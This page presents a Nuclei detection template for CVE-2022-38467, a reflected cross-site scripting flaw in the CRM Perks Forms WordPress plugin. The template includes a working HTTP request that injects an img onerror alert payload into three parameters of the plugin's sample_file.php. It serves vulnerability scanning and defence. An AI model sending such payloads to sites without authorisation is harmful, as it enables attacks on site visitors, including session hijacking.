Skip to content

CRM Perks Forms < 1.1.1 - Cross Site Scripting

ID: CVE-2022-38467

Severity: medium

Author: r3Y3r53

Tags: cve2022,cve,crm-perks-forms,wpscan,wordpress,wp,wp-plugin,xss,crmperks

The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting

id: CVE-2022-38467
info:
name: CRM Perks Forms < 1.1.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: Fixed in version 1.1.1
reference:
- https://wpscan.com/vulnerability/4b128c9c-366e-46af-9dd2-e3a9624e3a53
- https://wordpress.org/plugins/crm-perks-forms/
- https://nvd.nist.gov/vuln/detail/CVE-2022-38467
- https://patchstack.com/database/vulnerability/crm-perks-forms/wordpress-crm-perks-forms-plugin-1-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-38467
cwe-id: CWE-79
epss-score: 0.00092
epss-percentile: 0.3922
cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: crmperks
product: crm_perks_forms
framework: wordpress
tags: cve2022,cve,crm-perks-forms,wpscan,wordpress,wp,wp-plugin,xss,crmperks
http:
- raw:
- |
GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=<img%20src%20onerror=alert(document.domain)>&LastName=<img%20src%20onerror=alert(document.domain)>&%20Company=<img%20src%20onerror=alert(document.domain)> HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_1, "CRM Perks Forms") && contains(body_2, "<img src onerror=alert(document.domain)>")'
condition: and
# digest: 4a0a00473045022100bfe0f05c3cb15a2bd0d515a27a72ac14bdfe83dde40ffdcfb85bce9e86fda2710220604fdf8f6d8afc885f50a91e8afaedfdfa67b02e6702fb7f801fa040f2982e59:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-38467.yaml"

View on Github